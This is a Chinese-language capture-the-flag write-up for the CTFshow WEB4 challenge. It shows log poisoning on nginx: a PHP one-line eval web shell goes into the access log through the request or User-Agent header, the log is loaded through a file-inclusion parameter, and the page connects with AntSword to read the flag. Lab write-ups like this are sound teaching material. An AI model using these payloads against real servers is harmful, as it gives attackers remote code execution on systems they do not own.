日志注入漏洞


靶機:CTFshow WEB4

漏洞測試

1.輸入進行測試

2.查看相應日志文件,在本題中文件日志默認地址為/var/log/nginx/access.log

(可通過抓包查看得知服務器為Ubuntu,由nginx搭建的網站,nginx的日志文件默認地址在/var/log/nginx/access.log和/var/log/nginx/error.log,其中本題中access.log可以打開)

?url=/var/log/nginx/access.log,查看文件日志,發現剛剛get的phpinfo存在日志里,且被轉義

3.重新Get 並進行抓包

將這里的%3C?php%20phpinfo();?%3E改成<?php phpinfo();?>

修改之后放包,再去文件包含日志文件,發現已被執行

4.由此判斷存在日志注入漏洞

法一

1.輸入一句話木馬<?php @eval($_POST[npfs]);?>

2.抓包將轉義后的<?php @eval($_POST[npfs]);?>修改回來,放包(實際做法,如上面所述)

3.訪問日志文件,查看存在一句話木馬內容,說明一句話木馬被當作php語言正常解析

4.蟻劍連接

flag在根目錄下的www的flag.txt文件中

法二

1.url :?url=/var/log/nginx/access.log,抓包

2.利用 user-agent 插入 payload 到日志文件

  1. 放包,蟻劍連接

flag在根目錄下的www的flag.txt文件中


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM